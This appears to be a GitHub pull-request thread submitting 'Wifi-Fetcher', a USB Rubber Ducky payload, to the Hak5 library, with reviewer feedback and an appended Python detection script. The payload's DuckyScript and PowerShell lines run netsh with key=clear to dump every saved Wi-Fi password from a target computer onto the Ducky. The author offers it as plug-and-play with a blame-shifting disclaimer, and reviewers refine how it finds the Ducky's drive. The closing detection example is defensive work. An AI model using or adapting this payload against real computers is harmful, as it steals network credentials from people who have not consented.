Wifi-Fetcher Payload #425
Adding a payload to the Hak5 library
After uploading the payload for approval I just now saw that the winner of the recent Payload-awards has a script that serves almost the same functionality as mine, only that mine has 0 dependencies for the target since I used integrated system components and the output file is stored locally, which doesn't even require an internet connection. You also won't need a Dropbox token; if you create the directory in your Ducky, it's basically Plug 'n Play. Just don't have too much fun ; )
Shortened overall runtime
Obfuscation by making the cmd less readable
Fixed error with delays. Removed the obfuscation because it was affecting the execution time too much. Also made the script run in only 22 seconds, which means we cut around 15 seconds from the initial script
Your disclaimer regarding the required directory needs to go into the payload.txt, otherwise no one will ever see it after this is merged. You should also use DEFINE for this so it is easily changeable.
Added DISCLAIMER and INSTRUCTIONS
Used DEFINE in the script for easy adaptability
Please don't publish it yet as I will have to test it beforehand. I will make some last changes in the next 24 hours, then it can be published to the repo.
It is ready, you can go ahead and put it in the repo.
REM credits:ChatGPT helped a little here and there while debugging | ||
REM DEPENDENCIES: NONE | ||
REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) | ||
DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." |
I would change this to be a REM rather than a DEFINE.
REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) | ||
DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." | ||
REM | ||
DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" |
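Review bot: the constant names on the two DEFINE lines (DISC and INSTR) are short, unprefixed words, and DEFINE behaves as a find-and-replace at compile time, so a name like DISC can match inside other text in the payload such as the word DISCLAIMER. If these stay as DEFINEs, use a distinctive `#`-prefixed name. The header text itself also needs a proofread: "may vary based of taged specifications" in the TOTAL_EXEC_TIME line presumably means "based on target specifications", and "the Distribute(Hak5 LLC.)" presumably means "the distributor".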
I would change this to be a REM rather than a DEFINE.
DELAY 220 | ||
STRINGLN color FE | ||
DELAY 50 | ||
STRINGLN start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" & exit |
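Review bot: the second command in the STRINGLN line, `netsh wlan export profile key=clear`, has no folder= argument, so netsh writes one XML file per profile, each holding the cleartext key, into the current directory on the target machine, and only netsh's status messages are appended to all_wifi_passwords.txt. That does not match the description that the output is stored on the Ducky. The REM header and README should state that the payload leaves profile XML files with plaintext keys on the host, and the file name all_wifi_passwords.txt should reflect what it actually contains.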
A better approach for this is to use dynamic code that locates the Ducky's drive location. You can use PowerShell in order to locate the drive name DUCKY, which is the default drive name.
For example:
Get-Volume | Where-Object { $_.FileSystemLabel -eq 'DUCKY' } | Select-Object -ExpandProperty DriveLetter
This dynamically locates the drive letter for the Ducky. Keep in mind that not everyone will be using the default label of DUCKY; it is recommended you add a DEFINE for the label: DEFINE #DUCKY_DRIVE_LABEL DUCKY
This allows the user to easily configure the payload for their specific configuration.
DEFINE #DUCKY_DRIVE_LABEL DUCKY
STRINGLN Get-Volume | Where-Object { $_.FileSystemLabel -eq '#DUCKY_DRIVE_LABEL' } | Select-Object -ExpandProperty DriveLetter
@@ -0,0 +1,28 @@ | |||
REM NAME: Wifi-Fetcher |
You have placed your payload in the wrong directory. Please ensure that your payloads are uploaded to the correct directory: payloads/library/exfiltration/Wifi-Fetcher/payload.txt
A Paylaod that will exfiltrate all the wifi information that has been saved on the computer and pull it to the D:\loot\PwnedWIFI\all_wifi_info.txt file in your usb rubber ducky, if the file is not in that directory it will create it.
IF YOU DONT HAVE THE DIRECTORY D:\loot\PwnedWIFI\ On THE DUCKY, THIS SCRIPT WILL NOT WORK, EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE
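
For defenders, the command line this payload types is a stable detection point: `netsh wlan` queries that request `key=clear`, with output sent to a drive other than the system drive. The following is an added example, not part of the pull request; the event records, host names and the assumption that C: is the system drive are constructed for illustration.

```python
import re

# Constructed process-creation records (the shape of Sysmon Event ID 1 or
# Security 4688 with command-line auditing); hosts and times are made up.
SAMPLE_EVENTS = [
    {"host": "ws-014", "time": "2024-05-02T09:14:07Z",
     "cmdline": "netsh wlan show profiles"},
    {"host": "ws-014", "time": "2024-05-02T09:14:31Z",
     "cmdline": "powershell \"netsh wlan show profiles | ForEach-Object "
                "{ netsh wlan show profile name=$_ key=clear } | Out-File "
                "-FilePath 'D:\\loot\\PwnedWIFI\\all_wifi_info.txt'; "
                "netsh wlan export profile key=clear\""},
    {"host": "ws-022", "time": "2024-05-02T10:02:55Z",
     "cmdline": "NETSH.EXE WLAN EXPORT PROFILE folder=C:\\Temp KEY=CLEAR"},
    {"host": "ws-030", "time": "2024-05-02T11:40:12Z",
     "cmdline": "netsh wlan export profile folder=C:\\Backup"},
]

# A netsh wlan profile query plus its arguments up to the next pipe or separator.
NETSH_WLAN = re.compile(
    r"\bnetsh(?:\.exe)?\s+wlan\s+(show\s+profiles?|export\s+profile)\b([^|;&]*)",
    re.I)
KEY_CLEAR = re.compile(r"\bkey\s*=\s*clear\b", re.I)
# Drive letter of an Out-File target, a shell redirect, or netsh's folder= argument.
OUT_DRIVE = re.compile(
    r"(?:Out-File\b[^|;]*?|>>?\s*|\bfolder\s*=\s*)['\"]?([A-Za-z]):\\", re.I)


def analyze(cmdline, system_drive="C"):
    """Return the reasons a command line is suspicious (empty list if none)."""
    reasons = []
    for m in NETSH_WLAN.finditer(cmdline):
        if KEY_CLEAR.search(m.group(2)):
            verb = " ".join(m.group(1).lower().split())
            reasons.append(f"netsh wlan {verb} with key=clear")
    if reasons:  # only look at destinations once plaintext keys are requested
        for drive in OUT_DRIVE.findall(cmdline):
            if drive.upper() != system_drive:  # assumption: C: is the system drive
                reasons.append(f"output written to {drive.upper()}:\\")
    return reasons


def triage(events):
    """Return (host, time, reasons) for every event with at least one reason."""
    return [(e["host"], e["time"], r) for e in events
            if (r := analyze(e["cmdline"]))]


if __name__ == "__main__":
    for host, when, why in triage(SAMPLE_EVENTS):
        print(host, when, "; ".join(why))
```

Plain profile listing and exports without `key=clear` are not flagged, which keeps routine administration out of the results.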